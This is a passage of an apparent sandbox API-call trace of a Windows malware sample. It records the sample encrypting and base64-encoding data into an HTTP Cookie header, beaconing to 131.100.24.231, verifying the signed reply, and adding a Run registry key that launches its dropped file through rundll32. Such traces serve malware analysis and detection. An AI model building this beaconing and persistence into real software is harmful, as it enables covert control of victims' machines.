ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0588.411] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0588.411] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0588.411] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0588.411] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0588.412] GetProcessHeap () returned 0x530000 [0588.412] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0588.413] GetProcessHeap () returned 0x530000 [0588.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0588.414] GetProcessHeap () returned 0x530000 [0588.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0588.414] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0588.415] GetProcessHeap () returned 0x530000 [0588.415] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0588.415] GetProcessHeap () returned 0x530000 [0588.415] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0588.415] GetProcessHeap () returned 0x530000 [0588.415] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e28 [0588.415] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0588.415] GetProcessHeap () returned 0x530000 [0588.416] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e28 | out: hHeap=0x530000) returned 1 [0588.416] GetProcessHeap () returned 0x530000 [0588.416] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0588.416] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0588.416] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0588.416] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0588.416] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0588.416] GetProcessHeap () returned 0x530000 [0588.416] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0588.416] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0588.416] GetProcessHeap () returned 0x530000 [0588.416] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76350 [0588.418] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0588.418] GetProcessHeap () returned 0x530000 [0588.418] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0588.419] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0588.419] GetProcessHeap () returned 0x530000 [0588.419] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xf4) returned 0x5e2970 [0588.420] GetProcessHeap () returned 0x530000 [0588.423] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0588.423] GetProcessHeap () returned 0x530000 [0588.423] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0588.423] CryptBinaryToStringW (in: pbBinary=0x5e2970, cbBinary=0xf4, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0588.423] GetProcessHeap () returned 0x530000 [0588.423] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x292) returned 0x2b65430 [0588.423] CryptBinaryToStringW (in: pbBinary=0x5e2970, cbBinary=0xf4, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsxquGp+AQgAMVNuNAjXUtm+1bBKmDd3thnApqAcVytMCrKMm2yWsNhh7Up590qt5pY/WzTfvH5fDtNl0vQJEqkgmkHt2teggxvuPOGHdPaH/2yCRg==", pcchString=0x2cf504) returned 1 [0588.423] GetProcessHeap () returned 0x530000 [0588.423] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0588.424] GetProcessHeap () returned 0x530000 [0588.424] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0588.424] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: haUItdEjm=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsxquGp+AQgAMVNuNAjXUtm+1bBKmDd3thnApqAcVytMCrKMm2yWsNhh7Up590qt5pY/WzTfvH5fDtNl0vQJEqkgmkHt2teggxvuPOGHdPaH/2yCRg==\r\n") returned 348 [0588.424] GetProcessHeap () returned 0x530000 [0588.424] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0588.424] GetProcessHeap () returned 0x530000 [0588.424] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0588.425] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0588.425] GetProcessHeap () returned 0x530000 [0588.425] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0588.425] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0588.427] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="cafEzF", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0588.427] GetProcessHeap () returned 0x530000 [0588.427] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0588.427] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0588.427] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0588.427] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0588.428] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: haUItdEjm=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsxquGp+AQgAMVNuNAjXUtm+1bBKmDd3thnApqAcVytMCrKMm2yWsNhh7Up590qt5pY/WzTfvH5fDtNl0vQJEqkgmkHt2teggxvuPOGHdPaH/2yCRg==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0589.544] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0589.544] GetProcessHeap () returned 0x530000 [0589.544] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0589.545] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0xa6) returned 1 [0589.545] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47ea6, dwNumberOfBytesToRead=0xff5a, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47ea6*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0589.545] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0589.545] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0589.545] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0589.545] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0589.545] GetProcessHeap () returned 0x530000 [0589.545] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76350 [0589.545] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76350, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76350, pcbResult=0x2cf51c) returned 0x0 [0589.545] GetProcessHeap () returned 0x530000 [0589.545] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0589.545] GetProcessHeap () returned 0x530000 [0589.545] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0589.545] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0589.546] GetProcessHeap () returned 0x530000 [0589.546] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0589.546] GetProcessHeap () returned 0x530000 [0589.547] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0589.547] GetProcessHeap () returned 0x530000 [0589.547] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0589.547] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0589.547] GetProcessHeap () returned 0x530000 [0589.547] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0589.547] GetProcessHeap () returned 0x530000 [0589.547] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0589.547] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0589.547] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76398, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0589.547] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0589.547] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0589.547] GetProcessHeap () returned 0x530000 [0589.548] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0589.548] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0589.548] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76354, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0589.550] GetProcessHeap () returned 0x530000 [0589.550] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6a0 [0589.552] GetProcessHeap () returned 0x530000 [0589.552] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0589.552] GetProcessHeap () returned 0x530000 [0589.553] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0589.553] GetProcessHeap () returned 0x530000 [0589.553] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e2970 | out: hHeap=0x530000) returned 1 [0589.553] GetProcessHeap () returned 0x530000 [0589.553] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0589.553] GetProcessHeap () returned 0x530000 [0589.553] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0589.553] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0589.554] GetProcessHeap () returned 0x530000 [0589.554] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83d20 [0589.554] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",yGDkHmLf") returned 98 [0589.554] GetProcessHeap () returned 0x530000 [0589.554] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83d20 | out: hHeap=0x530000) returned 1 [0589.554] GetProcessHeap () returned 0x530000 [0589.554] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76350 [0589.554] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x658, lpdwDisposition=0x0) returned 0x0 [0589.555] GetProcessHeap () returned 0x530000 [0589.555] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0589.555] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",yGDkHmLf") returned 98 [0589.555] RegSetValueExW (in: hKey=0x658, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",yGDkHmLf", cbData=0xc6 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",yGDkHmLf") returned 0x0 [0589.556] RegCloseKey (hKey=0x658) returned 0x0 [0589.556] GetProcessHeap () returned 0x530000 [0589.556] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6a0 | out: hHeap=0x530000) returned 1 [0589.556] GetProcessHeap () returned 0x530000 [0589.556] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0589.556] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xed11e) returned 0x102 [0599.627] GetProcessHeap () returned 0x530000 [0599.627] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0599.628] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0599.628] GetProcessHeap () returned 0x530000 [0599.628] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0599.628] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0599.628] GetProcessHeap () returned 0x530000 [0599.628] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0599.628] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0599.628] GetProcessHeap () returned 0x530000 [0599.628] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0599.628] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83d20 [0599.633] FindNextFileW (in: hFindFile=0x2a83d20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0599.634] FindNextFileW (in: hFindFile=0x2a83d20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0599.634] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0599.634] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0599.634] FindNextFileW (in: hFindFile=0x2a83d20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0599.634] FindClose (in: hFindFile=0x2a83d20 | out: hFindFile=0x2a83d20) returned 1 [0599.634] GetProcessHeap () returned 0x530000 [0599.634] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0599.636] GetProcessHeap () returned 0x530000 [0599.636] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0599.636] GetProcessHeap () returned 0x530000 [0599.636] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0599.636] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0599.725] GetProcessHeap () returned 0x530000 [0599.725] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0599.725] GetProcessHeap () returned 0x530000 [0599.725] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0599.725] GetProcessHeap () returned 0x530000 [0599.725] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0599.725] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0599.725] GetProcessHeap () returned 0x530000 [0599.725] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0599.725] GetProcessHeap () returned 0x530000 [0599.725] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0599.725] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0599.726] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0599.726] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0599.726] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0599.726] GetProcessHeap () returned 0x530000 [0599.726] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0599.726] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0599.726] GetProcessHeap () returned 0x530000 [0599.726] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76350 [0599.728] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0599.728] GetProcessHeap () returned 0x530000 [0599.728] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0599.728] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0599.728] GetProcessHeap () returned 0x530000 [0599.728] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x119) returned 0x2a49848 [0599.729] GetProcessHeap () returned 0x530000 [0599.730] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0599.730] GetProcessHeap () returned 0x530000 [0599.730] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0599.730] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x119, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0599.730] GetProcessHeap () returned 0x530000 [0599.730] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f2) returned 0x5eacb0 [0599.730] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x119, dwFlags=0x40000001, pszString=0x5eacb0, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTkquX0ddAMrdew4jiIWqrDqa9qD8ObVzsU9lAqeYNYqgsgVDAemRvf/sg/bORBTzJi26MzKTLnOBjh1BnQp2ESAptb1HHgQtu5lULVbj4G8OHH1kT9JlKd8EOkcjxzdiuqlmqAzY8gT49p/SuGvfQTGEFkgM2CsM5QE=", pcchString=0x2cf504) returned 1 [0599.730] GetProcessHeap () returned 0x530000 [0599.730] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0599.731] GetProcessHeap () returned 0x530000 [0599.731] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63080 [0599.731] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: 